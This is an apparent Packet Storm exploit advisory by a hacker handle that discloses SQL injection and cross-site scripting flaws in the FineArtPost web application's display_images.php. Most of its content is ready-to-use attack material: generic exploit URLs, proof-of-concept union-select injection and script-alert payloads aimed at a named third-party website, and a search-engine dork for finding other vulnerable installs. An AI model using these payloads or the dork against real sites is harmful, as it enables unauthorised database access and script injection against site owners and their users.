FineArtPost suffers from remote SQL injection and cross site scripting vulnerabilities.
a2af1f25dfd45d986ed00ef1fdb6c92513b637a51d53cc86f39ebd8e15282667 -------+AntiSecurity[dot]Org-------------
==================================================================
Title : FineArtPost SQL Injection & XSS Vulnerability
Software : FineArtPost
Vendor : http://www.fineartpost.com
Author : OoN_Boy
Blog : http://oon.blogspot.com
Web : http://oonboy.info
==================================================================
[o] Vulnerable file
display_images.php
==================================================================
[o] Exploit
sql
http://target.com/[path]/display_images.php?u_id=[SQL]
xss
http://target.com/[path]/display_images.php?u_id=[Xss]
==================================================================
[0] Poc
http://www.ctbauer.com/public/display_images.php?u_id=-210%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--
http://www.ctbauer.com/public/display_images.php?u_id=%22%3Cscript%3Ealert(1)%3C/script%3E%22
==================================================================
[o] Dork
"Powered by FineArtPost"
==================================================================
[O] Special Greetz
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -
Vrs-hCk, NoGe, h4ntu, Opay, Ipay, Paman, reel, H312Y, pizzyroot,
xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, kaka11,
==================================================================
Mohon Maaf lahir batin all maaf kalo banyak salah kata selama ini
pensiun mode on :))
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed